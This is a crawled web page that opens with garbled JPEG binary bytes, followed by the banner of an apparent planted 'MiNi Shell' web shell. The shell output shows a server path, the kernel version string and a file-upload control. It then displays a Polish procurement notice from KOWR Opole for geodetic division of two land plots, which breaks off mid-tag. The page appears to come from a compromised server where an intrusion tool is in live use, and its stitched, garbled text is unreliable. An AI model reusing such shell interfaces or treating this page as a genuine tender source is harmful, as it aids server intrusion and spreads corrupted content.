JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211028/0024965301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Prace geodezyjne – 2 zadania częściowe </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KRAJOWY OŚRODEK WSPARCIA ROLNICTWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ODDZIAŁ TERENOWY W OPOLU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 36784953800113</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1 Maja 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-068</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.opole@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Realizacja zadań w zakresie wdrażania i stosowania instrumentów wsparcia rolnictwa, gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prace geodezyjne – 2 zadania częściowe </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-217ec518-37bf-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00249653</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011465/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Usługi geodezyjne w zakresie: regulacji stanu prawnego, sporządzanie dokumentacji geodezyjno - prawnej, aktualizacja danych ewidencyjnych, sporządzanie operatu pomiarowego.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się w języku polskim przy użyciu<br/>środków komunikacji elektronicznej, za pośrednictwem Platformy Zakupowej pod adresem<br/>https://kowr.eb2b.com.pl/ i pod numerem postępowania wskazanym w ust. 11.17 SWZ.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na Platformie Zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie<br/>Zakupowej oraz korzystanie z Platformy jest bezpłatne. Wymagania techniczne i organizacyjne<br/>korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej dostępny pod adresem<br/>internetowym https://platforma.eb2b.com.pl/user/terms. Wykonawca przystępując do postępowania o<br/>udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania<br/>konta w Platformie Zakupowej), akceptuje warunki korzystania z Platformy, określone w Regulaminie<br/>oraz uznaje go za wiążący. Wykonawca korzystając z Platformy zobowiązuje się do przestrzegania<br/>postanowień zawartych w ww. instrukcji oraz w regulaminie Platformy. Wszelkie dokumenty,<br/>oświadczenia, informacje, o których mowa w SWZ, należy wczytać jako załączniki na Platformie,<br/>według Instrukcji korzystania z Platformy, dostępnej dla zalogowanych użytkowników w zakładce<br/>„Pomoc” – „Instrukcje”. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy<br/>wynosi 50 MB. Zamawiający, zgodnie z § 3 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia<br/>30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452),, określa<br/>następujące niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie: 1) stały<br/>dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 2 mb/s; 2) komputer klasy<br/>PC lub PC lub MAC, o następującej konfiguracji: pamięć min. 4GB Ram, procesor Intel IV 4GHZ, jeden<br/>z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze wersje;<br/>3)zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer<br/>minimalnie wersja 11.0; 4) włączona obsługa JavaScript; 5) zainstalowany program Acrobat Reader.<br/>Zamawiający, zgodnie z § 3 ust. 1 rozporządzenia w sprawie sporządzania elektronicznych<br/>dokumentów oraz komunikacji elektronicznej określa informacje na temat kodowania i czasu odbioru<br/>danych: 1) wszelkie operacje na Platformie opierają się o czas serwera i dane zapisywane są z<br/>dokładnością co do setnej części sekundy;2) plik załączony przez Wykonawcę na Platformie i<br/>zapisany, widoczny jest w systemie jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest<br/>dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert; 3) oznaczenie<br/>czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz<br/>dokładny czas (hh:mm:ss), znajdującą się po prawej stronie dokumentu w kolumnie „Data przesłania”.<br/>Za datę przekazania na Platformę oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych<br/>informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich<br/>wczytania do Platformy. Potwierdzeniem prawidłowo przekazanego (dokumentu elektronicznego) jest<br/>automatyczne wygenerowanie komunikatu systemowego o treści „Plik został przesłany&#34;, po każdej<br/>prawidłowo wykonanej operacji. Oferta i oświadczenia dotyczące przesłanek wykluczenia<br/>z postępowania oraz spełniania warunków udziału w postępowaniu pod rygorem nieważności muszą<br/>być<br/>sporządzone w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym) lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str. 1), dalej jako „RODO”, wszystkie osoby, które ubiegają się o udzielenie<br/>zamówienia/złożyły ofertę. Zamawiający informuje, że: 1. Administrator danych<br/>osobowychAdministratorem, czylipodmiotem decydującym o celach i środkach przetwarzania<br/>Pani/Pana danych osobowych, jestKrajowy Ośrodek Wsparcia Rolnictwa (zwany dalej KOWR) z<br/>siedzibą w Warszawie (01-207) przy ul.Karolkowej 30. Z administratorem może się Pani/Pan<br/>skontaktować poprzez adres e-mail:kontakt@kowr.gov.pl lub pisemnie na adres korespondencyjny:<br/>Krajowy Ośrodek Wsparcia Rolnictwa,ul. Karolkowa 30, 01-207 Warszawa. 2. Inspektor Ochrony<br/>Danych OsobowychW KOWR wyznaczonoInspektora Ochrony Danych Osobowych, z którym może się<br/>Pani/Pan skontaktować w sprawachochrony i przetwarzania swoich danych osobowych pod adresem<br/>e-mail: iodo@kowr.gov.pl lubpisemnie na adres naszej siedziby, wskazany w ust. 1.3. Cele i podstawy<br/>prawne przetwarzaniadanych osobowychPani/Pana dane osobowe przetwarzane będą w celach<br/>związanym zpostępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy<br/>z dnia 11września 2019 r. Prawo zamówień publicznych – Dz.U. z 2019 r. poz. 2019 z póżn. zm. (dalej<br/>PZP), wcelach związanych z realizacją obowiązków administratora jako Zamawiającego, które<br/>wynikają zobowiązujących przepisów prawa. Pani/Pana dane osobowe przetwarzane będą także w<br/>celu realizacjiobowiązku prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z<br/>ustawą z dnia14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164<br/>z późn.zm.).4. Odbiorcy danych osobowychPani/Pana dane pozyskane w związku z postępowaniem<br/>oudzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom<br/>iosobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego<br/>jestjawne.Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie<br/>wszczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt<br/>1i 2 PZP.Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć<br/>dostęppodmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną,<br/>usługiinformatyczne, usługi niszczenia dokumentów, jak również inni administratorzy danych<br/>osobowychprzetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową<br/>lubkurierską.5. Okres przetwarzania danych osobowych Pani/Pana dane osobowe będą<br/>przetwarzaneprzez okres przewidziany przepisami prawa w tym zakresie, w tym przez okres<br/>przechowywaniadokumentacji określony w przepisach powszechnych i uregulowaniach wewnętrznych<br/>KOWR w zakresie archiwizacji dokumentów, okres przedawnienia roszczeń przysługujących KOWR i<br/>ws<br/>tosunkudo niego.Dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego<br/>będzieprzechowywana, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania oudzielenie zamówienia, licząc od dnia 1 stycznia roku następnego po dniu zakończenia<br/>postępowania, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały<br/>czas trwaniaumowy. 6. Informacja o wymogu/dobrowolności podania danych osobowych Podanie<br/>Pani/Pana danychosobowych w związku z udziałem w postępowaniu o udzielenie zamówienia ma<br/>charakter dobrowolny, ale jest niezbędne do wzięcia w nim udziału</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7. Prawa osób, których dane dotyczą Zgodnie z<br/>RODO przysługuje Pani/Panu:1) prawo dostępu do swoich danych oraz otrzymania ich kopii; 2) prawo<br/>do sprostowania (poprawiania) swoich danych; 3) prawo do usunięcia danych osobowych, w sytuacji,<br/>gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z<br/>przepisu prawa lub w ramach sprawowania władzy publicznej; 4) prawo do ograniczenia przetwarzania<br/>danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa. Jeżeli<br/>chce Pani/Pan skorzystać z któregokolwiek z tych uprawnień, prosimy o kontakt z Inspektorem<br/>Ochrony Danych Osobowych, wskazany w pkt 2 lub pisemnie na adres korespondencyjny, wskazany<br/>wp<br/>kt1.Zgodnie z RODO, każdej osobie, której dane są przetwarzane przysługuje prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. 8. Zautomatyzowane<br/>podejmowanie decyzji W oparciu o Pani/Pana dane osobowe administrator nie będzie podejmował<br/>wobec Pani/Pana zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania. 9.<br/>Przekazywanie danych poza Europejski Obszar Gospodarczy W związku z jawnością postępowania o<br/>udzielenie zamówienia publicznego Pani/Pana dane mogą być przekazywane do państw trzecich (tj.<br/>państwa, które nie należy do Europejskiego Obszaru Gospodarczego obejmującego Unię Europejską,<br/>Norwegię, Liechtenstein i Islandię), z zastrzeżeniem, o którym mowa w punkcie 4.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OP.WOP.ZP.24.2021.U</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Zadanie częściowe nr 1<br/>Podział geodezyjny działki nr 402 obręb Miechowa, gmina Byczyna, powiat kluczborski, woj. opolskie, KW OP1U/00061569/1 w trybie rolnym zgodnie z załącznikiem graficznym stanowiącym załącznik nr 7 do SWZ. <br/>Zakres prac: <br/>•	wznowienie punktów granicznych wraz z ewentualnym przeprowadzeniem procedury rozgraniczeniowej działek wymienionych powyżej.<br/>Po zakończeniu prac Wykonawca zobowiązany jest dostarczyć Zamawiającemu:<br/>a)	wykaz współrzędnych wznowionych/rozgraniczonych punktów granicznych, w formie elektronicznej (w układzie 2000 - plik txt),<br/>b)	kopie protokołów granicznych wraz ze szkicami, <br/>c)	plik z danymi wektorowymi obrazującymi przebieg granic dzielonej nieruchomości <br/>(w układzie 2000 - plik dwg/dxf) lub kopia projektu do programu C-Geo,<br/>d)	kopia operatu geodezyjnego w formie elektronicznej,<br/>e)	pozytywny protokół weryfikacji wyników zgłoszonej prac geodezyjnej, dotyczącej podziału nieruchomości objętej umową.<br/>Opracowana w rezultacie wykonania zamówienia dokumentacja geodezyjno-prawna winna być kompletna z punktu widzenia celu jakiemu ma służyć, tj. do przeprowadzenia geodezyjnego podziału nieruchomości.<br/>Pozostałe wymogi i sposób wykonania zamówienia oraz prawa i obowiązki Stron zostały określone <br/>w Projektowanych postanowieniach umowy, stanowiących załącznik do SWZ nr 3a. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71250000-5 - Usługi architektoniczne, inżynieryjne i pomiarowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2)	Zadanie częściowe nr 2<br/><br/>Podział geodezyjny działki nr 1/2 obręb Kluczbork, gmina Kluczbork, powiat kluczborski, woj. opolskie, KW OP1U/00085533/4, w trybie ustawy o gospodarce nieruchomościami zgodnie <br/>z postanowieniem Burmistrza Miasta Kluczbork GNP.6724.79.2021.LS z dnia 18.08.2021 r. - stanowiącym załącznik nr 8 do SWZ. <br/>W tym wznowienie punktów granicznych wraz z ewentualnym przeprowadzeniem procedury rozgraniczeniowej działki wymienionej powyżej.<br/><br/>Realizacja przedmiotu zamówienia podzielona jest na dwa etapy: <br/>a)	ETAP I: <br/>Po zakończeniu realizacji przedmiotu zamówienia, składającego się na Etap I, Wykonawca zobowiązany jest dostarczyć Zamawiającemu:<br/>•	oryginały niezbędnych dokumentów do celów prawnych w celu uzyskania decyzji zatwierdzającej podział nieruchomości (protokół z przyjęcia granic nieruchomości, mapę z projektem podziału, wykaz zmian gruntowych, wykaz synchronizacyjny jeżeli oznaczenie działek gruntu w katastrze nieruchomości jest inne niż w księdze wieczystej),<br/>•	wykaz współrzędnych wznowionych/rozgranicznych punktów granicznych, w formie elektronicznej (w układzie 2000 - plik txt),<br/>•	kopie protokołów granicznych wraz ze szkicami zakupione jako kopia materiału zasobu <br/>z Ośrodka Dokumentacji Geodezyjnej i Kartograficznej, <br/>•	plik z danymi wektorowymi obrazującymi przebieg granic dzielonej nieruchomości (w układzie 2000 - plik dwg/dxf) lub kopia projektu do programu C-Geo,<br/>•	kopia operatu geodezyjnego w formie elektronicznej.<br/>Opracowana w rezultacie wykonania zamówienia dokumentacja geodezyjno-prawna winna być kompletna z punktu widzenia celu jakiemu ma służyć tj. do przeprowadzenia geodezyjnego podziału nieruchomości (dokumentacja ma umożliwić wydanie decyzji o zatwierdzeniu podziału nieruchomości).<br/>b)	ETAP II: <br/>Uzyskanie ostatecznej decyzji zatwierdzającej podział nieruchomości przez Zamawiającego.<br/>Pozostałe wymogi i sposób wykonania zamówienia oraz prawa i obowiązki Stron zostały określone <br/>w Projektowanych postanowieniach umowy, stanowiących załącznik do SWZ nr 3b. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71250000-5 - Usługi architektoniczne, inżynieryjne i pomiarowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span 